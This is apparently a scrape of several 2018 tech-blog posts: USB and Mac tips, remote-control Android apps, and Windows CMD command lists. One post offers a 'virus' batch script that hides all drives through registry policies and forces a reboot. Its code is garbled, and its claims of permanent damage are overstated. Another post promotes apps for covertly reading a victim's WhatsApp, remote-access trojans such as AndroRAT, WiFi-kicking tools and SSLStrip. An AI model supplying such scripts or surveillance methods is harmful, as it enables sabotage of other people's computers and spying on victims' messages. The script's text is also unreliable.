Sunday 15 July 2018

How To Fix USB/Pendrive Empty Problem Even The Drive Is Full


Time to fix out the pendrive issue showing empty even if the drive Is full. This type of problem occurs due to various reasons. However, we are going to share three easy methods that will help you fix Pendrive emtpy problem even when the drive is full. Go through the post to know about it.

How To Fix Pen Drive Empty Problem Even The Drive Is Full

The method is straight and simple, and you don’t need any technical knowledge, you just need a simple command entering that will easily fix out the issue of loss of files in Pendrive. Follow the methods discussed below.

#Method 1: New Drive Letter

Sometimes due to some hardware/software issue, our computer fails to recognize the hard drive and even if it does. It might show you some problem like empty USB drive even if the drive is full. So, here Assigning New drive letter might fix your problem and it is an easy task. So, make sure to apply this method first to check whether it’s working or not in your case. If it works, then you don’t need to go through the next methods.

Step 1. First of all, reinsert your USB drive on your computer and then right click on ‘My Computer’ and then click on ‘Manage.’

Step 2. Now you will get to see many options in Computer Management. Here you need to select the option ‘Disk Management.’


Step 3. Now you need to find your USB drive and then right-click on it and select the option ‘Change Drive Letters and Paths’


Step 4. Now you will be asked to choose a drive letter or Path. Simply select your drive letter and click ‘Ok’ button.

That’s it! Now remove your USB drive and reinsert it and check whether files inside your USB drive are showing or not. If it still doesn’t show you the file, go through the other methods.

#Method 2: Show Hidden Files In Computer

Step 1. First of all, you need to open My Computer and then click on “Organize.”

Step 2. Now from the drop down, select “Folder and search option.”

Step 3. Now you need to click on “View” tab which is located just behind the “General” tab.

Step 4. Now you need to search for the setting “Hidden Files and Folders” and there select the option “Show hidden files, folders, and drives” and then click on apply.

This method will eventually show your files and folders if it is kept hidden.

# Method 3: Using Command Prompt

Step 1. First of all, search for “cmd” in the start menu and then right click on command prompt and then select “Run As Administrator.

Step 2. Now in command prompt, you have to enter the command given below,
attrib -h -r -s /s /d x:*.*
where you need to replace x with the letter of your drive.

That’s it! The process will take few seconds and you are done, now open your drive in explorer, and you will see all your files present there, that is these are recovered.

So above is all about How to Fix Pendrive Empty Problem Even The Drive Is Full. With the above-discussed methods, you can easily recover all the files from the USB drive where you can’t view all your files, but the memory is full there. So use the above-discussed methods and fix out this issue. Hope this solution works for you, keep on sharing our tricks. Leave a comment below if you have any related queries with this.

How To Remotely Control One Android With Another


For Android users, we are here with a method to remotely control one Android with another. This method can be done using some best apps that will provide you the remote access of another Android. Go through the full article to know about it.

How To Remotely Control One Android With Another

This method can be done using some best apps that will provide you the remote access to another Android and you can have the complete privilege to access all the service of that Android. So have a look on these Best remote control Access Apps below.

#1 Team Viewer

As many of you might be familiar with this name as its the one of the best apps for accessing another PC from one and similarly its Android version helps you to control one Android from another. The user interface of this app is cool and you need user ID and Password of another Android to have complete access to it using this app.

Features:

  • Effortlessly access computers behind firewalls and proxy servers
  • Intuitive touch and control gestures (including Windows 8 multitouch support)
  • Full keyboard functionality (including special keys such as Windows®, Ctrl+Alt+Del )
  • Transfer files in both directions
  • Multi-monitor support
  • Sound and video transmission in real-time
  • Highest security standards: 256 Bit AES Session Encoding, 2048 Bit RSA Key Exchange

#2 Join.me


This is also a good app by using which you can control another Android device from yours. In this app, you can fix out many problems with any another Android using your Android device. Also, this app is perfect for any job holders or team discussions.

Features:

  • Create your own personal link (join.me/your name)
  • Set your personal, branded background image
  • Swap presenters during meetings
  • Set your own background image in settings
  • Includes full access to join.me desktop version too

#3 RemoDroid

This is very popular apps that help you to control another Android device using your one. This is a remote control app, which allows you to control Android devices with any other Android phone, PC or Mac. The app is currently in a beta state, that means it is buggy and might not work with all devices. The app is mainly developed for remote control of Android TV sticks but it works well with a wide range of Android smartphones and tablets.

Features
  • Screen sharing
  • Remote control (Android device and PC)
  • Multiple users support
  • Connection Managment
  • Wifi and 3G (Local Network and Internet)

#4 ScreenShare (Tablet)

ScreenShare enables wireless sharing of videos, music, photos, web pages and many types of documents from your phone to your tablet. This app is available for free in order to serve as a reference implementation for Spring Design and its parent company’s patents with multi-screens applications.

Features
  • ScreenShare organizer can let you share and play your phone contents.
  • With ScreenShare Browser, you don’t have to be in a range of a Wi-Fi signal to get your tablet online.
  • This is a full release and has no ads.

#5 Android VNC Viewer

This is another best app to have access to other Android device or say VNC server. This app provides lots of features like Import/export settings, save connection information, zoom control, keyboard and mouse control, connect to any machine running a VNC server and lots more which you will get to know after using this app.

Features
  • Connects to most VNC servers: including TightVNC, RealVNC on Win and Linux, x11vnc, and Apple Remote Desktop on OS/X.
  • Lots of customizable features let you adapt the way your device controls map to the controls of your desktop.
  • Preserves sent text from session to session (optionally; there is a new button to send text without remembering it)

#6 Tablet Remote

Tablet Remote lets you control an Android tablet or phone with another Android device. You can send common input like “Back”, “Home”, “Menu” or “Search” to the tablet, control its volume and brightness and also type words. You can navigate on the other device like a DPad and send the special command like “Play”, “Next” or “Previous” which is very useful when watching a movie.

Features:
  • You can play games that support key input with the gamepad like most Xperia Play compatible games.
  • Command like “Play”, “Next” or “Previous” which is very useful when watching a movie.

#7 AIO Remote

You can control any application on your computer through WIFI, Bluetooth by creating your fully customized custom remote controls. You can control another Android device (Beta)

Features:
  • Control PC, Control Another Android phone/tablet(Beta).
  • WIFI & Bluetooth are supported.
  • Windows, Linux, and Mac are supported.
  • Remote File Manager: Browse your files remotely and open them on your computer or Android device.
  • Advanced Mouse touchpad control.

#8 An2An Remote

Use your Android device to remote control another Android/PC device through Bluetooth or WiFi/Network. You can use your Android phone as a wireless keyboard/mouse/touchscreen or redirect physical keyboard/mouse/controller to the target device.

Features:
  • Screen is not blocked by the onscreen keyboard
  • You can use another compatible device as a “bridge”
  • Turn wired keyboard/mouse/controller into wireless one
  • Extended customizability by using together with GameKeyboard
  • Use touchscreen apps on devices which have no physical touchscreen

#9 ScreenShare

ScreenShare enables wireless sharing of videos, music, photos, web pages and many types of documents from your phone to your tablet. The screenshare organizer can let you share and play your phone contents (photos, videos, music, documents, etc.) to your tablet or TV (via HDMI cable) and export your phone contents to your tablet storage.

Features:
  • Call notifications on your computer
  • Text from computer and tablet
  • Multimedia messages
  • The only remote texting app with native apps for Android tablet
  • MMS Group Chat
  • Complete call log history
  • Support for any browser

#10 Mysms SMS Text Messaging Sync

SMS & Call on your PC or Mac or Tablet in Perfect Sync with Any Android mobile.

Features:
  • Call notifications on your computer
  • Text from computer and tablet
  • Multimedia messages
  • The only remote texting app with native apps for Android tablet
  • MMS Group Chat
  • Complete call log history
  • Support for any browser
So above is all about How To Remotely Control One Android With Another. With the apps discussed above, you can easily control an Android tablet or phone from another very easily. And with that, you can help others solving their device problems and sharing some cool things remotely. Hope you like these apps, send us your feedback in the comment box below about our work.

Top 10+ Best CMD Commands Used In Hacking 2018


We all know that Command Prompt is one of the most powerful tools in Windows which is well known by CMD. Today we are going to share top CMD or MS-DOS commands which you must know if you want to be a hacker. Therefore, if you have just made a mind of becoming a hacker then you could learn to utilize these ten best CMD commands used in hacking.

10+ Best CMD Commands Used In Hacking 2018

We all know that Command Prompt is one of the most powerful tools in Windows which is well known by CMD. It is the command-line interpreter on Windows OS. With the help of CMD, you can do almost anything with your PC/laptop. We can’t explain what exactly CMD can do! However, hackers or some professional users know how to make full use of Command Prompt.

Here in this article, we are going to show you the list of best CMD commands which are used by hackers. Therefore, if you have just made a mind of becoming a hacker then you could learn to utilize these ten best CMD commands used in hacking.

#1 ping

This command uses your internet connection in order to send some packets of data to a specific web address then these packets are sent back to your PC. The test simply shows the amount of time it took to reach the specific address. In simple words, it helps you to know if the host you pinging is alive.

You can use Ping command whenever you need to verify that the host computer can connect to the TCP/IP network and its resources.

For example, you can type in Command prompt ping 8.8.8.8 which belongs to Google.

You can replace “8.8.8.8” to “www.google.com” or something else which you want to ping.

#2 nslookup

It is a network administration command-line tool which helps you to obtain domain name or IP address mapping for any specific DNS record. Suppose you have a website URL but want to know its IP Address, you can simply type in CMD

nslookup www.google.com (Replace Google.com with your website URL of which you want to find the IP address)

#3 tracert

You can say Trace Route like its name it allows users to trace the route than an IP packed has taken to reach a destination. The command calculates and displays the amount of time each hop took to reach a destination. You just need to type

tracert x.x.x.x (if you know the IP Address) or else you can type tracert www.google.com (If you don’t know the IP address)

#4 arp

This command helps you to modify ARP cache. You can run arp-a command on each computer to see whether the computers have the correct MAC address listed for each other to ping each other successfully on the same subnet.

This command also helps users to find out if anyone has done arp poisoning in their LAN.

You can try typing arp-a in command prompt.

#5 ipconfig

This is the command which shows every useful thing. It will show you IPv6 address, temporary IPv6 address, IPv4 address, Subnet Mask, Default gateway and all other things that you want to know.

You can type in command prompt “ipconfig” or “ipconfig/all

#6 netstat

If you want to find out who is establishing a connection with your computer then you might try typing in command prompt “netstat -a” it will display all the connection and you will get to know about the active connections and listening ports.

Type in command prompt “netstat -a

#7 Route

It is a command which is used to view and manipulate the IP routing table in the Microsoft Windows operating system. This command will show you routing table, metric and interface.

You can type in command prompt “route print.”

#8 Net View

This command displays the whole list of resources, computers or domains that are shared by the specified computer.

You can type in command prompt “net view x.x.x.x or computername

#9 Net User

Well, this command is used to modify changes to use accounts on a computer. You can add, remove users with the help of this command

You can use these commands while using net user

net user [<UserName> {<Password> | *} [<Options>]] [/domain] net user [<UserName> {<Password> | *} /add [<Options>] [/domain]] net user [<UserName> [/delete] [/domain]]

#10 Net Use

This command is been used to connect, remove and configure connections to shared resources like network printers and other mapped drives. The use of this command is a little bit complicated. So, we recommend you to visit the Microsoft site to get full details on how to use this command.

#11 Tasklist

This command opens up an entire task manager on the command prompt. Users just need to enter tasklist on CMD and they will see the list of all running process. You can figure out all the wrongs with this commands.

Moreover, the command can also be used when you need to forcefully close any process. For example, if you want to kill PID 1532 process then you can enter the command: taskkill /PID 1532 /F

#12 iexplore

As we all know, hackers often try to execute some apps, such as the web browsers. So, hackers use the iexplore option to execute apps and web pages. For example, if you enter iexplore www.google.com on the command prompt, it will open the URL in Internet Explorer.
Not only these, but you can even use iexplore <IP address> to find sites running on any particular IP address. The command is used in multiple ways by the hackers.

So, above are the 10 best CMD commands used in hacking. You can actually explore the lot more than this, we have listed A-Z CMD commands in one of our articles! I Hope you like the post! Share it with your friends too. Leave a comment below if you want to add any command in the list.

Thursday 12 July 2018

How To Create a Virus That Disable All Hard Disks


Note:- This virus can permanently damage your computer so use it at your own risk, as we are not responsible for any damage occur. As this is only for knowledge and security purposes and to make you aware of these viruses.

T present world is computer world and to become wise you must be smart in both the real world and the virtual world. So we always, keep on sharing different tricks for you that helps you become more clever in the virtual world. So today in this article, we have a new thing for you. Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. However, have you ever thought to create a virus? Maybe no. Therefore, we have a method to Create a Virus That Disable All Hard Disks. The method is very simple and easy and you will be able to create a virus by your own. Just follow the below steps to proceed.

How To Create a Virus That Disable All Hard Disks

Step 1. First of all, click on start and type Notepad and then press enter.

Step 2. Now copy the below code and paste in the notepad

REG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVer sionpoliciesExplorer /v NoDrives /t REG_DWORD /d 12nREG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVer sionpoliciesExplorer /v NoViewonDrive /t REG_DWORD /d 12nshutdown -r -c ”Lolllll! Your system is hacked by Techviral!” -f

Step 3. Now save this file as virus.bat
You can change "virus" to anyname.bat


So this is a method to Create a Virus That Disable All Hard Disks. By this, all hard drive will stop working and your computer might shut down permanently. And this virus is very harmful and you can even test your antivirus by scanning this file as if it discover this then its working good else you need to change it. If you like the post then don’t forget to share it with your friends too.

How to Fully Secure Your MAC with These 9 Steps


Let’s have a look at the complete guide for How to Fully Secure Your Mac with These 9 Steps that will help you to secure your Apple computer from certain security risks that can prone your data to hackers and they can illegally access the sensitive data. So have a look at these methods that will help you to get secure from all these things.

MAC is secure by default but still is hardly tempered off the security implementations and penetration could be fairly possible. This means that if you are using the Mac device for normal usage yet does not care about the security then nothing is required to change. But if you are using this device for the business purpose or the important purposes then increasing the security is a must. There are some simple ways in which this device can be secured ultimately from all possible attacks and hacks. Here in this article, we have written about the best ways through which the Mac can be fully secured using the 9 steps. If you are interested in reading about this information or find it helpful for your usage then please read it down. All of the proper information is provided in the main section of this post as is given below, remember to read till the end of the page so that you get the whole knowledge regarding the topic. So, let’s get started!

#1 Switch on FileVault


FileVault is a powerful encryption system. This can be used to encrypt and secure all contents of the disk. Even if hackers have access to your physical hard drive, the data cannot be attained or accessed without the password. So must go and try some of the best vault systems that use encryption techniques that should not be hacked.

#2 Strong Password for the Login


This is a tip but not any step or method to make the Mac more secure. Many people choose the simple passwords for their Mac which they could easily remember and this makes it less secure. To get the strongest protection from being hacked use the strongest password for the login on Mac.

#3 Assistance Using Password Manager


Do not make use of the files or the Cloud for saving your passwords. Even those files could be hacked so why not to go for the highly secure password managers. These managers will save the passwords for all your accounts in secure servers and you will be safe always.

#4 Encrypt Separately Important Files


Those files that are really important you must encrypt those separately for the highest safety. This will even enforce the multiple encryptions on the selected files and hacking or attacks could not pierce through the security.

#5 Find My Mac for Ultimate Security


This is the remote safety feature that is available inside the Mac devices. Simply turn it on so that in case you get your Mac stolen or lost, you can be able to remove all of the data from the device with just one single command or click.

#6 Firewall Stealth Mode Always On


By default, the firewall of the Mac is always on but in case if you have switched it off then please make sure that you turn it on and keep it alive always. This firewall would help you detect and remove the threats and attacks.

#7 Sharing Mode Off Until Next Use


Remember to turn off the file sharing mode on your device until you are not requiring to use it. This sharing can be a pathway for the hackers and the could attack and get inside your Mac device data.

#8 Network Activity Must be Focused


While you surf the internet you may go through the various insecure activities and this can cause your Mac. Notice the things that you perform online and be on the secure edge always.

#9 Keep Backups and Encrypt Those All


The backups of your data files that you keep on the device must be encrypted for the security. Use any of the tools out of those available on the internet and encrypt the files and backups.

Finally, after reading this article, you have got to know about the easy way of securing the Mac fully just by making use of the 9 simple steps. All of the information given here is written in such a way that anyone can get about the important aspects easily. Hope that you might be liking the information given in this article if it is so then please try to share it with others too. Also, share your suggestions and opinions regarding this content by using the comments section below.

Here is the list of all Windows CMD commands sorted alphabetically along with exclusive CMD commands pdf file for future reference for both pro and newbies.

Command Prompt and CMD Commands are unknown territories for most of the Windows users, they only know it as a black screen for troubleshooting the system with some fancy commands.

If you are Linux user then you would know how commands play an important role in different system operations. Unlike Linux, Windows is a user-friendly operating system and we don’t require to play with CMD commands at all to do our task. In most cases, people open Command Prompt only when they need to repair a corrupted disk, hide certain drives, to create a hacking-like environment etc.

What is Command Prompt and CMD Commands?

Command Prompt, also known as cmd.exe or cmd — a command line interpreter application on Windows NT family operating systems. And CMD Commands are the specific set of instructions given to Command Prompt to perform some kind of task or function on your Windows PC. Most of the Windows CMD Commands are used to automate tasks via scripts and batch files, perform advanced administrative functions, and troubleshoot and solve certain kinds of Windows issues.

So here is the A-Z list of Windows CMD commands to perform desired tasks which you normally do by using the GUI. Also, you can use these commands to do some exciting hacks through Windows — which we will list soon.

How To Access Command Prompt ?

Before we start first we will see how to open Command Prompt program.

Three ways you can run Command Prompt program :


  1. Simply by typing cmd in the Start Menu search bar.
  2. If you are using Windows 8,then you can access Command Prompt via the Command Prompt shortcut located in the Start Menu or on the Apps screen.
  3. Or you can press CTRL+R to open the RUN utility, type cmd, and press Enter.
Note:
Many commands can only be executed if Command Prompt is being run as an administrator. To open an Elevated Command Prompt — Locate the Command Prompt shortcut, then right-click on it to bring up its pop-up menu of options and from the pop-up menu, choose Run as administrator. Accept any User Account Control messages or warnings.

A-Z Windows CMD Commands

CMD Commands Function
A
 addusers
Used to add and list users in a CSV file
 admodcmd
Used for bulk modifying contents in an active directory
 arp
Address Resolution Protocol is used to map IP address to the hardware address
 assoc
Used to change associations for file extensions
 associat
One step file association
 at
Run a command at a specific time
 atmadm
Display connection info of the ATM adapter
 attrib
Used to change file attributes
B
 bcdboot
Used to create and repair a system partition
 bcdedit
Used to manage boot configuration data
 bitsadmin
Used to manage the Background Intelligent Transfer Service
 bootcfg
 Used to edit boot configuration in Windows
 break
Enable/Disable break capability (CTRL+C) in CMD
C
 cacls
Used to change permissions of files
 call
Used one batch program to call another
 certreq
Used to request a certificate from a certification authority
 certutil
Manage Certification Authority files and services
 cd
Used to change folder (directory) or go to a specific one
 change
Used to change terminal services
 chcp
Displays the number of active console code page
 chdir
Same as cd command
 chkdsk
Used to check and repair issues in the disk
 chkntfs
Used to check the NTFS file system
 choice
Accept user input (via keyboard) to a batch file
 cipher
Used to encrypt/decrypt files and folder
 cleanmgr
Used clean temp files and recycle bin automatically
 clip
Copy result of any command (stdin) to Windows clipboard
 cls
Clear CMD screen
 cmd
Used to start a new CMD shell
 cmdkey
Used to manage stored usernames and passwords
 cmstp
Used to install or remove a connection manager service profile
 color
Change the color of the CMD shell using options
 comp
Compare contents of two files or two sets of files
 compact
Compress files and folders on an NTFS partition
 compress
Compress one or more files
 convert
Convert a FAT partition to NTFS
 copy
Copy one or more files to another location
 coreinfo
Show the mapping between logical and physical processors
 cprofile
Cleans specified profiles of wasted space and disabled user-specific file associations
 cscmd
Configure offline files on a client computer
 csvde
Import or Export the data of an active directory
D
 date
Used to display the date or change it
 defrag
Used to defragment system hard drive
 del
Used to delete a file(s)
 delprof
Used to delete user profile(s)
 deltree
Used to delete a folder and its sub-folders
 devcon
Access the command line device manager utility
 dir
Used to display files and folders list
 dirquota
Manage File Server Resource Manager quotas
 diruse
Used to display disk usage
 diskcomp
Compare contents of two floppy disks
 diskcopy
Copy data of one floppy disk to another
 diskpart
Make changes to partitions of storage, both internal and connected
 diskshadow
Access the Disk Shadow Copy Service
 diskuse
View used space in folder(s)
 doskey
Used to edit command line, recall commands, and create macros
 driverquery
Display a list of installed device drivers
 dsacls
View and edit access control entries for objects in active directory
 dsadd
Used to add objects to active directory
 dsget
View objects in active directory
 dsquery
Find objects in an active directory
 dsmod
Used to modify objects in an active directory
 dsmove
Rename or move an active directory object.
 dsrm
Remove objects from an active directory
 dsmgmt
Manage Active Directory Lightweight Directory Services
E
echo
Turn command-echoing feature on/off, display a message on the screen
endlocal
End localization environment changes in a batch file
erase
Used to delete on or more file(s)
eventcreate
Add custom event to Windows event log (Admin rights required)
eventquerry
Display list of events and their properties from event logs
eventtriggers
Display and configure event triggers on local and remote machines
exit
Exit the command line (Quit current batch script)
expand
Uncompress one or more .CAB file(s)
explorer
Open Windows Explorer
extract
Uncompress one or more Windows cabinet file(s)
F
fc
Used to compare two files
find
Used to search a specified text string in a file
findstr
Used to find string patterns in files
finger
Display information about user(s) on a specified remote computer
flattemp
Used to enable/disable flat temporary folders
For
Run a command in a loop for a file(s) for defined parameter
forfiles
Used for batch processing of selected file(s)
format
Used to format a disk
freedisk
Used to check free space on a disk
fsutil
File system utility to manage file and drive properties
ftp
Use FTP service to transfer files from one PC to another
ftype
Display/ Modify file extension type associations
G
getmac
Used to display the MAC address of your network adapter
goto
Used to direct a batch program to a line identified by a label
gpresult
Display Group Policy Settings and Resultant Set of Policy for a user
gpupdate
Update local and active directory based on group policy settings
graftabl
Turn on the ability to display an extended character in graphics mode
H
help
Display a list of commands and see online information for them
hostname
Used to display host name of the computer
I
icacls
Used to change permissions of files and folders
iexpress
Used to create a self-extracting zip archive
if
Used for conditional processing in batch programs
ifmember
Display the group(s) an active user belongs to
inuse
Replace the files which the OS is currently using (restart required)
ipconfig
Display and change Windows IP configuration
ipseccmd
Used to configure IP Security policies
ipxroute
Display and modify routing table information used by IPX protocol
irftp
Used to send files over an infrared link (infrared functionality required)
L
label
Used to change the name of a disk
lodctr
Update registry values with latest performance counters
logman
Used to manage performance monitor logs
logoff
Log a user off
logtime
Add the date, time, and a message to a text file
lpq
Displays print queue status
lpr
Used to send a file to a computer running the Line Printer Daemon service
M
macfile
Manage files server for Mackintosh
makecab
Used to create .cab files
mapisend
Used to send email from command line
mbsacli
Microsoft Baseline Security Analyser
mem
Used to show memory usage
md
Used to create directories and sub-directories
mkdir
Used to create directories and sub-directories
mklink
Used to create symbolic link to a directory
mmc
Access Microsoft Management Console
mode
Configure COM, LPT, CON system devices
more
Display one screen of output at time
mountvol
Create, list, or delete a volume mount point
move
Used to move files from one folder to another
moveuser
Move user account to a domain or between machines
msg
Used to send a pop-up message to a user
msiexec
Install, modify, configure using Windows Installer
msinfo32
Display system information
mstsc
Create a remote desktop connection
N
nbstat
Display NetBIOS over TCP/IP information
net
Used to manage network resources and services
netdom
Network Domain Manager utility
netsh
Display or modify network configuration
netstat
Display active TCP/IP connections
nlsinfo
Used to display locale information
nltest
List domain controllers, force remote shutdown, etc
now
Display date and time
nslookup
Check IP address on a Name Server
ntbacku
Backup data to tape using CMD or batch file
ntcmdprompt
Runs cmd.exe instead of command.exe in an MS-DOS application
ntdsutil
Manage Active Directory Domain Services
ntrights
Used to edit user account privileges
ntsd
Only for system developers
nvspbind
Used to modify network bindings
O
openfiles
Queries or displays open files
P
pagefileconfig
Display and configure Virtual memory settings
path
Set PATH environment variable for executable files
pathping
Latency and Packet loss info for each node in the network path
pause
Used to stop processing of a batch file
pbadmin
Starts Phone Book Administrator
pentnt
Detect Floating Point Division error in the Pentium chip
perfmon
Access performance monitor in CMD
perms
Display a user\’s ACL permissions for a file
ping
Test network connection to a computer
popd
Go to the latest path/folder stored by PUSHD command
portqry
Display TCP and UDP port status
powercfg
Used to configure power settings and know battery health
print
Used to print a text file(s) from CMD
printbrm
For backup/recovery/migration of the print queue
prncnfg
Used to configure/rename a printing device
prndrvr
List/add/delete printer drivers
prnjobs
List/pause/resume/cancel print jobs
prnmngr
List/add/delete printers, display/set default printer
prnport
List/create/delete TCP printer ports, display/change port configuration
prnqctl
Clear printer queue, print a test page
procdump
Monitor system for CPU spikes, generate a crash report during a spike
prompt
Used to change the Prompt in CMD
psexec
Run a CMD process on a remote computer
psfile
Display remotely opened files, close an open file
psinfo
List system information about a local/remote machine
pskill
Kill a process(es) using its name or process ID
pslist
Display process status and info about active processes
psloggedon
See active users on machine
psloglist
Display event log records
pspasswd
Used to change account password
psping
Used to measure network performance
psservice
Display and control services on a machine
psshutdown
Shutdown/restart/logoff/lock a local or remote machine
pssuspend
Used to suspend a process on a local or remote computer
pushd
Change current folder and store previous folder for use by POPD
Q
qgrep
Search file(s) for a given string pattern
query
process or qprocess Display information about processes
R
rasdial
Display Remote Access Service Status
rasphone
Manage RAS connections
rcp
Copy files to a computer running remote shell service
recover
Recover readable data from a defective disk
reg
Display/add/change registry keys and values in Windows registry
regedit
Import/export/delete settings from a .reg text file
regsvr32
Used to register/unregister a DLL file
regini
Used to change registry permissions
relog
Export performance counters to other formats like TSV, CSV, SQL
rem
Add comments in batch file
ren
Used to rename a file(s)
replace
Used to replace a file with another file of same name
reset
session Used to reset a remote desktop session
rexec
Run commands on remote machines running Rexec service
rd
Used to delete a folder(s)
rmdir
Used to delete a folder(s)
rmtshare
Manage file and printer shares local or remote servers
robocopy
Used to copy files and folders that have changed
route
Display/change the local IP routing table
rsh
Run commands on remote servers running RSH service
rsm
Manage media resources using Removable storage
runas
Run a program as a different user
rundll32
Used to run a DLL program
S
sc
Use Service Controller to manage Windows services
schtasks
Schedule command(s) to run at a specific time
secedit
Configure system security
set
Display/set/remove environment variables in CMD
setlocal
Control visibility of environment variables in a batch file
setspn
Manage Service Principal Names for an Active Directory service account
setx
Set Environment Variables permanently
sfc
System File Checker
share
List/edit a file share or print on any computer
shellrunas
Used to run a command as a different user
shift
Change the position of the batch parameters in a batch file
shortcut
Create a Windows shortcut
shutdown
Shutdown the computer
sleep
Put computer to sleep for specified number of seconds
slmgr
Software Licensing Management tool for activation and KMS
sort
Used to sort and display a redirected or piped input
start
Start a program, command, or batch file
strings
Find ANSI and UNICODE strings in binary files
subinacl
Display/modify ACEs for file and folder permissions
subst
Associate a path with a drive letter
sysmon
Monitor and log system activity to Windows event log
systeminfo
Display detailed configuration information about the computer
T
takeown
Used to take the ownership of a file
taskkill
Used to terminate on or more running processes
tasklist
Display a list of running apps and services.
tcmsetup
Enable/disable TAPI client
telnet
Communicate with a remote machine using TELNET protocol
tftp
Transfer files to and from a remote machine running TFTP protocol
time
Display/change system time
timeout
Delay a batch file execution for specified seconds
title
Change the text on top of CMD window
touch
Change file timestamps
tracerpt
Process event trace logs and generate trace analysis report
tracert
Trace route to a remote host by sending ICMP request messages
tree
Display a folder structure in the form of a graphical tree
tsdiscon
Terminate a remote desktop connection
tskill
Terminate a running process on a RD Session Host server
tssutdn
Shutdown/reboot a terminal server remotely
type
Show contents of a text file
typeperf
Write performance data to a CMD window or a log file
tzutil
Time Zone Utility
U
unlodctr
Remove performance counter names and explain text for a service from the registry
V
ver
Show version number of installed OS
verify
Verify whether files are saved correctly on the disk
vol
Show disk volume label and serial number
vssadmin
Show shadow copy backups, installed shadow copy writers and providers
W
w32tm
Access Windows Time Service Utility
waitfor
Used to synchronize events between networked computer(s)
wevtutil
Retrieve information about event logs and publishers
where
Find and display file(s) in the current directory
whoami
Display information about the active user
windiff
Compare contents of two files or sets of files
winrm
Windows Remote Management
winrs
Windows Remote Shell
wmic
Windows Management Instrumentation Command
wuauclt
Windows Update Agent to download new update files
X
xcalcs
Change ACLs for files and folders
xcopy
Copy files or directory trees to another folder
::
That’s it! If you think we forget to add any other CMD commands in this list, please notify us. Also here is get a copy of list of CMD Commands PDF too.
List of CMD Commands PDF File

Tuesday 10 July 2018

Android Hacking Apps And Tools Of 2018


Nowadays every geek wants to turn their Android smartphone into a hacking device. But most of them don’t know where to start, what to install.

So today we are going to list some great hacking tools, to make hacking possible in Android. Even though great hackers use these Android hacking apps to convert their smartphones into a fully-featured hacking machine.

Note : Only For Educational Purposes
Listed applications are for educational purposes only. Do not try to use it if it’s not legal in your country. And also not use them to harm anybody or to gain unauthorized access to any account you do not own. Use this software only for analyzing your own security. I do not take any responsibility for anything you do using this application. Use at your own risk.


1. Orbot


A must have app to become anonymous on the internet. Orbot is an android app developed by the Tor Project for internet freedom and privacy. Basically, it allows you to hide your real IP address by bouncing your communications around a distributed network of relays run by volunteers all around the world. It also has the ability to transparently torify all of the TCP traffic on your Android device (only on rooted devices). Orbot is not just Tor, it also contains LibEvent and a lightweight web proxy server -“Polipo”.

2. Fing – Network Tools

Fing, the top ranking, completely free and super-fast network scanner to discover which devices are connected to any Wi-Fi network, map devices, detect intruders, assess network security risks, troubleshoot network problems and achieve best network performance, with the world’s most popular network toolkit.
With more than a dozen free network tools including; Wi-Fi scanner, port scanner, DNS lookup, ping and service monitoring – Fing is a must-have network utility.

3. Hackode

Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc

4. SSHDroid

SSHDroid is a SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like “terminal” and “adb shell”) or edit files (through SFTP, WinSCP, Cyberduck, etc…

5. SSLStrip for Android

SSLStrip is a tool that transparently hijacks HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into look-alike HTTP links or homograph-similar HTTPS links.

6. Hash Decrypt

Hash Decrypt is an android app that enables you to crack/decrypt a hash. This app uses the dictionary attack to crack a hash. It supports 10 different hash functions such as MD2, MD4, MD5, SHA1, SHA-256, SHA-384, SHA-512, Tiger, RIPEMD-128 and RIPEMD-160.

7. Whatscan

If you wonder how to hack WhatsApp account and monitor all the incoming and outgoing messages of someone who know. Then you should try Whatscan — a WhatsApp web integrated application. In order to hack WhatsApp with this app you must first access the victim device physically and then scan his/her WhatsApp web QR-code to activate the service. unlike other Android hacking apps Whatscan doesn’t requires root permission since the app uses genuine method to access WhatsApp (via WhatsApp web).

8. DriveDroid

With DriveDroid you can unlock any password protected PC/laptop just by connecting your your Android phone via USB.

DriveDroid allows you to boot your PC from ISO/IMG files stored on your phone. This is ideal for trying Linux distributions or always having a rescue-system on the go… without the need to burn different CDs or USB pendrives.

DriveDroid also includes a convenient download menu where you can download USB-images of a number of operating systems from your phone (like Mint, Ubuntu, Fedora, OpenSUSE and Arch Linux). Around 35 different systems are available at this moment.

9. PixelKnot: Hidden Messages

With PixelKnot, only your friends with the secret password can unlock your special message. Everyone else just sees a pretty picture. It’s a fun and easy way to share hidden messages without anyone knowing.

10. NetCut

With NetCut, you can quickly detect all network user in WIFI, even when your phone has no valid IP address or not been granted use wifi internet. as long as you connected to any WIFI, netcut can work. With this app set on/off line to any network users, including phone/xbox,softphone, PS3, PS4 etc.

11. WIFI WPS WPA TESTER

Do you want to know if your Access Point is vulnerable at the WPS protocol? Wifi Wps Wpa Tester is the app that you need. With this app, you can test the connection to AP with WPS PIN.

12. Change My MAC – Spoof Wifi MAC

Airports or railway stations, coffee shops or hotels, nowadays almost all public places offer free Wi-Fi. But most of them employ time limits to control the usage. But changing MAC address of your Android would solve this problem. With this tool, you can easily spoof your device MAC address enjoy free unlimited Wi-Fi.

13. WPS Connect

WPS Connect will help you to hack into WiFi networks which have WPS protocol enabled. The app is focused on verifying if your router is vulnerable to a default PIN. Many routers that companies install own vulnerabilities in this aspect. With this application, you can check if your router is vulnerable or not and act accordingly.

14. Market Helper

Market Helper is a tool for Android that helps users can change/fake their rooted devices to any other devices. It can make your Nexus 7 become Samsung Galaxy S3 in a few seconds. No reboot is required. This app also let you install incompatiable or country restricted apps without any hassle.

15. Androrat

AndroRAT (Android Remote Administration Tool) is a client/server application developed in Java Android for the client side and in Java/Swing for the Server. By successfully running this tool one can retrieve following information from target Android device: Get contacts (and all theirs informations), Do vibrate the phone, Get call logs, Open an URL in the default browser, Get all messages, Send a text message, Location by GPS/Network, Do a toast, Monitoring received messages in live, Streaming video (for activity based client only), Monitoring phone state in live (call received, call sent, call missed..), Take a picture from the camera……etc

16. WiFi Kill

WiFi Kill is one of the best Android WiFi hacking app: used for disable other user wifi connection from your android mobile. You just need to download this amazing android app in your phone and you can easily kick off other user from connected wifi .

17. APKInspector

